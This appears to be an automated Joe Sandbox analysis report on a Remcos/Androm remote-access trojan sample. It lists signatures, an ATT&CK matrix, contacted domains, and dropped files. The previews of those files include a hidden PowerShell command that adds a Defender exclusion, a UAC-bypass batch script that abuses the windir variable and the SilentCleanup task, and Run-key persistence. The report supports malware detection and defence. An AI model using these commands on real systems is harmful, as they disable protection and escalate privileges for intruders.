              Source: DpiScaling.exeString found in binary or memory: Remcos_Mutex_Inj
              Source: DpiScaling.exe, 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
              Source: mobsync.exeString found in binary or memory: Remcos_Mutex_Inj
              Source: mobsync.exe, 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
              Source: mobsync.exe, 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
              Source: mobsync.exe, 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: cmd.exe28_2_006D55EA

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsNative API1Windows Service1Access Token Manipulation1Scripting1Input Capture11Account Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDefacement1
              Domain AccountsCommand and Scripting Interpreter1Registry Run Keys / Startup Folder1Windows Service1Obfuscated Files or Information2Credentials In Files2System Service Discovery1SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsService Execution2Logon Script (Mac)Process Injection422Software Packing1NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder1Masquerading1LSA SecretsSystem Information Discovery33SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonModify Registry1Cached Domain CredentialsSecurity Software Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol11Jamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion1DCSyncVirtualization/Sandbox Evasion1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection422/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 487629 Sample: yVhvGnsUpL Startdate: 21/09/2021 Architecture: WINDOWS Score: 100 44 twistednerd.dvrlists.com 2->44 74 Found malware configuration 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 Multi AV Scanner detection for submitted file 2->78 80 3 other signatures 2->80 9 Srakjle.exe 15 2->9         started        13 yVhvGnsUpL.exe 1 22 2->13         started        16 Srakjle.exe 15 2->16         started        signatures3 process4 dnsIp5 50 sn-files.fe.1drv.com 9->50 60 2 other IPs or domains 9->60 82 Multi AV Scanner detection for dropped file 9->82 84 Writes to foreign memory regions 9->84 86 Creates a thread in another existing process (thread injection) 9->86 18 mobsync.exe 9->18         started        52 sn-files.fe.1drv.com 13->52 54 qcisaa.sn.files.1drv.com 13->54 56 onedrive.live.com 13->56 42 C:\Users\Public\Libraries\...\Srakjle.exe, PE32 13->42 dropped 88 Injects a PE file into a foreign processes 13->88 21 DpiScaling.exe 2 13->21         started        24 cmd.exe 1 13->24         started        26 cmd.exe 1 13->26         started        58 sn-files.fe.1drv.com 16->58 62 2 other IPs or domains 16->62 28 mobsync.exe 16->28         started        file6 signatures7 process8 dnsIp9 64 Contains functionalty to change the wallpaper 18->64 66 Contains functionality to steal Chrome passwords or cookies 18->66 68 Contains functionality to steal Firefox passwords or cookies 18->68 46 twistednerd.dvrlists.com 31.3.152.100, 49745, 49746, 49747 ALTUSNL Sweden 21->46 48 192.168.2.1 unknown unknown 21->48 70 Contains functionality to inject code into remote processes 21->70 72 Delayed program exit found 21->72 30 reg.exe 1 24->30         started        32 conhost.exe 24->32         started        34 cmd.exe 1 26->34         started        36 conhost.exe 26->36         started        signatures10 process11 process12 38 conhost.exe 30->38         started        40 conhost.exe 34->40         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              yVhvGnsUpL.exe18%VirustotalBrowse
              yVhvGnsUpL.exe13%ReversingLabsWin32.Backdoor.Androm

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\Srakjle\Srakjle.exe13%ReversingLabsWin32.Backdoor.Androm

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              32.0.mobsync.exe.10590000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              12.0.DpiScaling.exe.10590000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              12.0.DpiScaling.exe.10590000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              28.0.mobsync.exe.10590000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              28.0.mobsync.exe.10590000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              28.0.mobsync.exe.10590000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              12.0.DpiScaling.exe.10590000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              32.0.mobsync.exe.10590000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              28.0.mobsync.exe.10590000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              12.2.DpiScaling.exe.10590000.2.unpack100%AviraTR/Dropper.GenDownload File
              28.2.mobsync.exe.6d0000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              32.2.mobsync.exe.10590000.1.unpack100%AviraTR/Dropper.GenDownload File
              32.0.mobsync.exe.10590000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              12.2.DpiScaling.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              32.2.mobsync.exe.720000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              28.2.mobsync.exe.10590000.1.unpack100%AviraTR/Dropper.GenDownload File
              32.0.mobsync.exe.10590000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              12.0.DpiScaling.exe.10590000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              twistednerd.dvrlists.com0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              twistednerd.dvrlists.com
              		31.3.152.100
              		truefalse
                		high
                onedrive.live.com
                		unknown
                		unknownfalse
                  		high
                  qcisaa.sn.files.1drv.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    twistednerd.dvrlists.comtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://qcisaa.sn.files.1drv.com/y4mNt-qRdwgdgleDGIKLTjkSpjyK1SPD4JqhzBPVsXePk0c3S_cv0HIXRKPw3hfw-miyVhvGnsUpL.exe, 00000001.00000003.258050716.00000000006BA000.00000004.00000001.sdmpfalse
                      		high
                      https://qcisaa.sn.files.1drv.com/y4mohjgwISBEqynaGbNFXQ3e1iQ9fbj0U-Xdj6_ZQCNnX6wH2IF_C6xvDKVjks_iaCmSrakjle.exe, 00000018.00000003.347807282.00000000008E2000.00000004.00000001.sdmpfalse
                        		high
                        https://qcisaa.sn.files.1drv.com/y4myaa9OvyECoBdBcRm0EdYi3SYgM-H9eDickjezG2FcBm2P6AhF8ifoGyKxGwKMCHJSrakjle.exe, 00000018.00000003.344865227.00000000008D1000.00000004.00000001.sdmpfalse
                          		high
                          https://qcisaa.sn.files.1drv.com/y4mJP3DWIE85gNIpmObLH3hi3UpJBBLdFJk7RCXT24FMEV8lArD0Fn2UIcXDbPv6JQHSrakjle.exe, 00000017.00000003.331649206.0000000000919000.00000004.00000001.sdmp, Srakjle.exe, 00000017.00000003.327780846.0000000000918000.00000004.00000001.sdmpfalse
                            		high
                            https://qcisaa.sn.files.1drv.com/y4mh8HSTx1Gc1J_Se9cvXUaWcrzZtNRVGZZTLbaxsKszTpDWJ-FC3XLmVZQpssvfNP6Srakjle.exe, 00000017.00000003.331649206.0000000000919000.00000004.00000001.sdmpfalse
                              		high
                              https://qcisaa.sn.files.1drv.com/y4mPMXRQ9RhgDP1jnSDjqdPjwRNYCC8VbCCQIIz4UaVns5irDBNa_yn-ZyicxZlvW-LSrakjle.exe, 00000017.00000003.327666701.0000000000908000.00000004.00000001.sdmp, Srakjle.exe, 00000018.00000003.357618476.00000000008DB000.00000004.00000001.sdmpfalse
                                		high
                                https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21155&authkey=AG_5U-eSrakjle.exe, 00000018.00000003.344865227.00000000008D1000.00000004.00000001.sdmpfalse
                                  		high

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  31.3.152.100
                                  		twistednerd.dvrlists.comSweden
                                  		51430ALTUSNLfalse

                                  Private

                                  IP
                                  192.168.2.1

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:487629
                                  Start date:21.09.2021
                                  Start time:22:13:55
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 13m 24s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:yVhvGnsUpL (renamed file extension from none to exe)
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:37
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.rans.troj.spyw.evad.winEXE@23/10@75/2
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 5.5% (good quality ratio 5.2%)
                                  • Quality average: 78.3%
                                  • Quality standard deviation: 27.4%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 33
                                  • Number of non-executed functions: 230
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12, 23.35.236.56, 20.50.102.62, 13.107.43.13, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211
                                  • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.dc-msedge.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  22:14:57API Interceptor2x Sleep call for process: yVhvGnsUpL.exe modified
                                  22:15:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Srakjle C:\Users\Public\Libraries\eljkarS.url
                                  22:15:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Srakjle C:\Users\Public\Libraries\eljkarS.url
                                  22:15:28API Interceptor2x Sleep call for process: Srakjle.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASN

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\Public\KDECO.bat
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):155
                                  Entropy (8bit):4.687076340713226
                                  Encrypted:false
                                  SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                                  MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                                  SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                                  SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                                  SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                                  C:\Users\Public\Libraries\Srakjle\Srakjle.exe
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):1133568
                                  Entropy (8bit):6.333495513346421
                                  Encrypted:false
                                  SSDEEP:12288:lIspEfnP8N/seflQTshT8aqeTW39KqyeoAdrL7SUbDz5Zp:320N/seflZhTmiW3AirPzz5Z
                                  MD5:CF98D2D4D4555323842C8371DB09347E
                                  SHA1:2BD28F09D3EA7C08BAE3A90DD32C28335488EB43
                                  SHA-256:8FA72E87ADDEAD9671E573D7CB843CA784A10CFBF6ACF5B6BC4830DF66FE0BF0
                                  SHA-512:972271FF4B87A3EE8217FD0F13EA9D0464124A117E96B09B6B96F49A7B21CF1076115F6E7BDA753866BDE4CFE9170A0EA7F9EAD75DDA695B3B29150FD29E4849
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 13%
                                  Reputation:unknown
                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................l.............@..............................................@..............................f*.......&...................0...v........................... .......................................................text.............................. ..`.itext.............................. ..`.data...............................@....bss....,9...............................idata..f*.......,..................@....tls....4................................rdata....... ......................@..@.reloc...v...0...x..................@..B.rsrc....&.......&...&..............@..@.....................L..............@..@................................................................................................
                                  C:\Users\Public\Libraries\eljkarS.url
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Srakjle\\Srakjle.exe">), ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):96
                                  Entropy (8bit):4.77898063752017
                                  Encrypted:false
                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMR52XHvsGKd6ov:HRYFVmTWDyzqwHvsbDv
                                  MD5:F7FE80CDDDABC41175A9174062BF9FB4
                                  SHA1:EA61F6248EAEF211BD5F08091C691E468161C847
                                  SHA-256:6B3C535B354D7C67C9A4840F8ACCD2AA9B2DFF80FF3C90BE66D944AA8A8E6F81
                                  SHA-512:A49CF21FD89CDFB5716BE3BBD38E91073804FB3B66D9F5AC34D0C3E86E2C4563D027986C4A2A2FE33991A2A652FE4DD3578411234B29FB81826079370C7FD926
                                  Malicious:false
                                  Yara Hits:
                                  • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\eljkarS.url, Author: @itsreallynick (Nick Carr)
                                  Reputation:unknown
                                  Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Srakjle\\Srakjle.exe"..IconIndex=2..
                                  C:\Users\Public\Trast.bat
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):34
                                  Entropy (8bit):4.314972767530033
                                  Encrypted:false
                                  SSDEEP:3:LjTnaHF5wlM:rnaHSM
                                  MD5:4068C9F69FCD8A171C67F81D4A952A54
                                  SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                                  SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                                  SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: start /min C:\Users\Public\UKO.bat
                                  C:\Users\Public\UKO.bat
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):250
                                  Entropy (8bit):4.865356627324657
                                  Encrypted:false
                                  SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                                  MD5:EAF8D967454C3BBDDBF2E05A421411F8
                                  SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                                  SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                                  SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                                  C:\Users\Public\nest
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):9
                                  Entropy (8bit):3.169925001442312
                                  Encrypted:false
                                  SSDEEP:3:cvn:cv
                                  MD5:64120803774747F6A0E65FBF68864DB9
                                  SHA1:2D19E04E427F41A57A40C45C8E15D7BD7FEFF91F
                                  SHA-256:4BC0305150E635DF5014B49EFB911171F08137F187564E8EC69148525100498F
                                  SHA-512:C57320C1EA459F360BDFAECB4F23882B7850A93F894B14C4356FE88B64FE397FF27CA2E9E52EA30484DEEF088AAB8970B98C8E73BB92C397552AA6A02BDAFC64
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: Srakjle..
                                  C:\Users\Public\nest.bat
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):53
                                  Entropy (8bit):4.263285494083192
                                  Encrypted:false
                                  SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
                                  MD5:8ADA51400B7915DE2124BAAF75E3414C
                                  SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                                  SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                                  SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: start /min reg delete hkcu\Environment /v windir /f..
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\Srakjlekngtcyxfikcsesbckosunxns[1]
                                  Process:C:\Users\user\Desktop\yVhvGnsUpL.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):844800
                                  Entropy (8bit):7.998270300086775
                                  Encrypted:true
                                  SSDEEP:24576:V0SUUlISC/pYz/bZ5ut74t8Ld/xUjdqJZ:VwUK7cEestxUj0H
                                  MD5:35CD77E767A6005B26709CE820FB50A6
                                  SHA1:3322111384C098DFDE8B8CDDF60CA078C642CB35
                                  SHA-256:4CA74BAB815601FB1A29D46116F084663A9722A403431CE59B9305DF3A86E785
                                  SHA-512:3A331821D2945E7A49BED2F9638738172FFC2758028DFEF58AAAF4D1DB960B42422A21A308859985CAB993FB4754E162A586CC18BFC09AEBD71290F30E8A2431
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ...].~*.g.a........P..O=.........U.....8..q.F....\..k.e..#....A~c.A\..pA^..Z.zZ....".".."....b&..S...?Y......."...f..[.#<.&./6.|^..Z.zZ....".".."../6...Y...!....0..F...s...K .&.3m....a.F..6..va..S......0.....].k..k.l./e....2...P.../n.[........4............m..G.].4.k.....Y....6.}..:.J....Y.S..,.W.?6.0.. .-e...N..2..%.C:.G>.9.A1...e...l..c....&.].....(.V;`y.Q..I=:.....d.4......z.JBLDR..D"PC.S0.+..._#.x..3."1...2.^.......qsod."&.g.0...I...`...v.....@.k:K.?....;e5..s....y.C...%.....o.|.J../.....[$,.*...._+.?.^...+........_1...K.._&.=.....t..>k.A.........?.PBY'.4ur..V.R.....?..g."6wa.W2..h.....$+...M...R.v.O.....c.R..l..f.'aKq.{{wz.r.{....Z.(..m.c...t.m.@qa..%.5.k.Fz..Y/..|.um...yd.......&._3.:`..=....k........A.DM....A...FT.ye.b......w.;..t..l.$-....h...?...U5...c...v..%.5.k.FS9.R.A....}]...>.Q*.FA.x..)..:r..qi.owwus~..I.6oe.v.....=.f.....DY'.O.FTK9.TG..L.._3..=.}_*.+...M.....@|....[....LM.E..S1&.Q&..Z... ?..1.-...~.6O.J.i...S!.R.q`....
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\Srakjlekngtcyxfikcsesbckosunxns[2]
                                  Process:C:\Users\Public\Libraries\Srakjle\Srakjle.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):844800
                                  Entropy (8bit):7.998270300086775
                                  Encrypted:true
                                  SSDEEP:24576:V0SUUlISC/pYz/bZ5ut74t8Ld/xUjdqJZ:VwUK7cEestxUj0H
                                  MD5:35CD77E767A6005B26709CE820FB50A6
                                  SHA1:3322111384C098DFDE8B8CDDF60CA078C642CB35
                                  SHA-256:4CA74BAB815601FB1A29D46116F084663A9722A403431CE59B9305DF3A86E785
                                  SHA-512:3A331821D2945E7A49BED2F9638738172FFC2758028DFEF58AAAF4D1DB960B42422A21A308859985CAB993FB4754E162A586CC18BFC09AEBD71290F30E8A2431
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ...].~*.g.a........P..O=.........U.....8..q.F....\..k.e..#....A~c.A\..pA^..Z.zZ....".".."....b&..S...?Y......."...f..[.#<.&./6.|^..Z.zZ....".".."../6...Y...!....0..F...s...K .&.3m....a.F..6..va..S......0.....].k..k.l./e....2...P.../n.[........4............m..G.].4.k.....Y....6.}..:.J....Y.S..,.W.?6.0.. .-e...N..2..%.C:.G>.9.A1...e...l..c....&.].....(.V;`y.Q..I=:.....d.4......z.JBLDR..D"PC.S0.+..._#.x..3."1...2.^.......qsod."&.g.0...I...`...v.....@.k:K.?....;e5..s....y.C...%.....o.|.J../.....[$,.*...._+.?.^...+........_1...K.._&.=.....t..>k.A.........?.PBY'.4ur..V.R.....?..g."6wa.W2..h.....$+...M...R.v.O.....c.R..l..f.'aKq.{{wz.r.{....Z.(..m.c...t.m.@qa..%.5.k.Fz..Y/..|.um...yd.......&._3.:`..=....k........A.DM....A...FT.ye.b......w.;..t..l.$-....h...?...U5...c...v..%.5.k.FS9.R.A....}]...>.Q*.FA.x..)..:r..qi.owwus~..I.6oe.v.....=.f.....DY'.O.FTK9.TG..L.._3..=.}_*.+...M.....@|....[....LM.E..S1&.Q&..Z... ?..1.-...~.6O.J.i...S!.R.q`....
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\Srakjlekngtcyxfikcsesbckosunxns[2]
                                  Process:C:\Users\Public\Libraries\Srakjle\Srakjle.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):844800
                                  Entropy (8bit):7.998270300086775
                                  Encrypted:true
                                  SSDEEP:24576:V0SUUlISC/pYz/bZ5ut74t8Ld/xUjdqJZ:VwUK7cEestxUj0H
                                  MD5:35CD77E767A6005B26709CE820FB50A6
                                  SHA1:3322111384C098DFDE8B8CDDF60CA078C642CB35
